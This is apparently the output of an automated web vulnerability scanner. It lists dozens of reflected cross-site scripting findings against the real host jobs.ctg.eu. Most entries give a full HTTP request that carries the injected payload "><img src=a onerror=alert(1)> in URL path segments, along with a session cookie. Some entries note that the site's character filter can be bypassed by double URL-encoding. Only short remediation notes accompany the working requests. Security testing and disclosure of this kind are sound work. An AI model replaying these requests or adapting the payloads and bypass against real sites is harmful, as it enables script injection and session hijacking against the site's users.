This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixtyf73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54/css/structure.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d was submitted in the REST URL parameter 5. This input was echoed as 89175"><img src=a onerror=alert(1)>0ae966e8e0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d/structure.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728 was submitted in the REST URL parameter 6. This input was echoed as 4b2b6"><img src=a onerror=alert(1)>3c9d629728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/structure.css4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf was submitted in the REST URL parameter 1. This input was echoed as 1c822"><img src=a onerror=alert(1)>883740fafdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf/all/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428 was submitted in the REST URL parameter 2. This input was echoed as f2148"><img src=a onerror=alert(1)>5cc8b9e6428 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allf2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68 was submitted in the REST URL parameter 3. This input was echoed as 555a2"><img src=a onerror=alert(1)>14329ddbf68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03 was submitted in the REST URL parameter 4. This input was echoed as 7d94b"><img src=a onerror=alert(1)>d650ca39f03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03/js/AC_RunActiveContent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03 was submitted in the REST URL parameter 5. This input was echoed as 867ae"><img src=a onerror=alert(1)>ab43a14ef03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03/AC_RunActiveContent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747 was submitted in the REST URL parameter 6. This input was echoed as bf1a2"><img src=a onerror=alert(1)>9e8f0dc5747 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/AC_RunActiveContent.jsbf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611 was submitted in the REST URL parameter 1. This input was echoed as 9369b"><img src=a onerror=alert(1)>60bd3b3e611 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611/all/themes/threesixty/js/easyTooltip.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb was submitted in the REST URL parameter 2. This input was echoed as b7318"><img src=a onerror=alert(1)>5390e89c2cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allb7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb/themes/threesixty/js/easyTooltip.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b was submitted in the REST URL parameter 3. This input was echoed as 29e37"><img src=a onerror=alert(1)>1d222c0ec3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b/threesixty/js/easyTooltip.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b3d"><img%20src%3da%20onerror%3dalert(1)>924cd6c50ba was submitted in the REST URL parameter 4. This input was echoed as 76b3d"><img src=a onerror=alert(1)>924cd6c50ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e was submitted in the REST URL parameter 4. This input was echoed as 56a7c"><img src=a onerror=alert(1)>eda61fe431e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e/js/easyTooltip.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106 was submitted in the REST URL parameter 5. This input was echoed as 80264"><img src=a onerror=alert(1)>f6f1a8b106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106/easyTooltip.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c was submitted in the REST URL parameter 6. This input was echoed as cb57e"><img src=a onerror=alert(1)>5c57ffbac9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/easyTooltip.jscb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628 was submitted in the REST URL parameter 1. This input was echoed as 55d6e"><img src=a onerror=alert(1)>17021c34628 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628/all/themes/threesixty/js/effects.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77 was submitted in the REST URL parameter 2. This input was echoed as 94d19"><img src=a onerror=alert(1)>638294a4b77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77/themes/threesixty/js/effects.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa was submitted in the REST URL parameter 3. This input was echoed as 1f881"><img src=a onerror=alert(1)>4e2f24ccbfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa/threesixty/js/effects.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc was submitted in the REST URL parameter 4. This input was echoed as 2f30d"><img src=a onerror=alert(1)>db1815b09dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc/js/effects.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4930d"><img%20src%3da%20onerror%3dalert(1)>04f9905d679 was submitted in the REST URL parameter 4. This input was echoed as 4930d"><img src=a onerror=alert(1)>04f9905d679 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745 was submitted in the REST URL parameter 5. This input was echoed as f9c7a"><img src=a onerror=alert(1)>e4699464745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/jsf9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745/effects.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89d3"><img%20src%3da%20onerror%3dalert(1)>87598a82479 was submitted in the REST URL parameter 5. This input was echoed as f89d3"><img src=a onerror=alert(1)>87598a82479 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc was submitted in the REST URL parameter 6. This input was echoed as f62b1"><img src=a onerror=alert(1)>24eb6b0f0fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/effects.jsf62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3 was submitted in the REST URL parameter 1. This input was echoed as 25e58"><img src=a onerror=alert(1)>c35af25cab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3/all/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490 was submitted in the REST URL parameter 2. This input was echoed as 3bcef"><img src=a onerror=alert(1)>3002399490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0 was submitted in the REST URL parameter 3. This input was echoed as a0d47"><img src=a onerror=alert(1)>eca9130c7e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themesa0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4 was submitted in the REST URL parameter 4. This input was echoed as 2d2bc"><img src=a onerror=alert(1)>f03d1286c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4/js/jquery.filestyle.mini.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
